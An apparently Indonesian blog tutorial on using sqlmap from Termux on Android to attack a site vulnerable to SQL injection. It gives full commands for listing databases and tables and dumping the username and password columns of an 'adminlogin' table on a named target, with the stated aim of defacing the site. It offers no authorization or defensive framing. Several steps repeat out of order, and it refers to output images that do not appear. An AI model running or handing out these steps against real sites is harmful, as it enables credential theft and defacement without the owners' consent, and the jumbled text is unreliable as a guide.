Hello bre,
Seperti yang gua bilang pada postingan sebelumnya, kalo gua bakal share bagaimana cara menggunakan sqlmap (yang gua share diandroid)
Pastikan dulu bahwa anda terkoneksi ke internet ok
Langsung sadja,
• Pertama-tama buka termuxnya dan ketik cd sqlmap
• Sebelumnya siapkan dulu target yang vuln dengan sqli ( disini target gua adalah http://www.acme.in )
• Kalau udah ada, ketik python2 sqlmap.py -u target --dbs
Ket : -u = url untuk target, setelah -u diisi targetnya, misal : python2 sqlmap.py -u http://www.acme.in/about.php?id=3 --dbs
--dbs = untuk mengambil seluruh databasenya
• Kalau sudah selesai nanti akan menampilkan database seperti ini
• Kalau sudah nanti akan muncul nama-nama tabelnya
• Selanjutnya ketik python2 sqlmap.py -u target -D nama database -T nama tabel --columns untuk mengambil colum di tabel yang lu mau
Contoh : python2 sqlmap.py -u http://www.acme.in/about.php?id=3 -D acmnverp_AcMdBvr1 -T adminlogin --columns ( kenapa gua ambil admin login ? Karna mau mepes :v )
• Kalau udah selesai bakalan nampilin colum yang ada di tabel seperti ini
Pastikan dulu bahwa anda terkoneksi ke internet ok
Langsung sadja,
• Pertama-tama buka termuxnya dan ketik cd sqlmap
• Sebelumnya siapkan dulu target yang vuln dengan sqli ( disini target gua adalah http://www.acme.in )
• Kalau udah ada, ketik python2 sqlmap.py -u target --dbs
Ket : -u = url untuk target, setelah -u diisi targetnya, misal : python2 sqlmap.py -u http://www.acme.in/about.php?id=3 --dbs
--dbs = untuk mengambil seluruh databasenya
Tunggu hingga proses selesai
Ada 2 database
• Selanjutnya ketik python2 sqlmap.py -u target -D nama datebase --tables untuk mengambil table yang ada didalam datebasenya
Ket : -D untuk nama datebasenya
--tables untuk mengambil table yang ada di datebase
Contoh : python2 sqlmap.py -u http://www.acme.in/about.php?id=3 -D acmnverp_AcMdBvr1 --tables
Tunggu hingga proses selesai
Contoh : python2 sqlmap.py -u http://www.acme.in/about.php?id=3 -D acmnverp_AcMdBvr1 -T adminlogin --columns ( kenapa gua ambil admin login ? Karna mau mepes :v )
Tunggu hingga proses selesai
• Setelah itu ketik python2 sqlmap.py -u target -D nama database -T nama tabel -C nama colum --dump untuk menampilkan isi colum
Contoh : python2 sqlmap.py -u http://www.acme.in/about.php?id=3 -D acmnverp_AcMdBvr1 -T admin login -C password,username --dump (di step ini bisa menampilkan 2 colum sekaligus dengan dipisahkan dengan koma (,) )
Ket : -C bisa sekaligus untuk membawa 2 column
Tunggu sampai prosesnya selesai
• Kalau sudah nanti hasilnya akan seperti ini
Sekian tutorial dari gua, kalau ada yang ga paham komen sadja
Sampe ketemu ditutorial berikutnya.
Kunjungi juga gan Tribun Kuota
ReplyDelete